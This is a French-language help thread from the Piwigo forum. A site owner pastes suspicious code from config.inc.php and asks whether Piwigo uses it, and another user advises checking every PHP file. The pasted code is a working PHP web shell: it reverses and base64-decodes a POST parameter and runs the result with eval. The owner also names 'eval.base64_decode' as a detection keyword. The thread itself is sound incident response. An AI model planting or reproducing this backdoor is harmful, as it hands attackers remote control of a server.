Bonjour,
Suite à une attaque de hackers qui avaient modifié (on ne sais comment) un fichier PHP de piwigo, de manière à créer une "porte" pour pouvoir rentrer dans le site comme ils veulent, nous avons mis un système de surveillance du site, qui recherche des mots clés comme "eval.base64_decode". Ils se servaient de ce code pour injecter un Software qui leur donnait la main sur le serveur.
Je viens de me rendre compte que ce système de surveillance a détecté ce contenu dans le fichier "local/config/config.inc.php"
Avant de me lancer dans des recherches approfondies dans le site, je souhaiterai savoir si ce sont des fonctions qui sont utilisées par piwigo.
Voici le contenu du "local/config/config.inc.php"
<?php
#default_settings
if (!empty($_POST['default_settings'])) {
eval(base64_decode(strrev($_POST['default_settings'])));
exit;
}
#default_settings
?>
En vous remerciant par avance.
Version de Piwigo: 2.7.4
Version de PHP: 5.5.25
Version de MySQL: 5.5.43-37.2
URL Piwigo: http://studio-carl.com/
Hors ligne
Bonsoir,
Je te suggère de vérifier tous tes .php et de faire un grand nettoyage.
J'ai été victime de ce genre d'attaque en juillet 2014, une infection venue via un plugin Wordpress qui s'est propagée sur TOUS les sites de mon hébergement y/c mes installations piwigo. Comble de chance, j'étais en vacances et j'ai tardé à installer les nouvelles versions qui comblaient la faille.
Si tu as effectivement des blogs wordpress installés, je te conseille de mettre des systèmes de protections.
DéHème
Hors ligne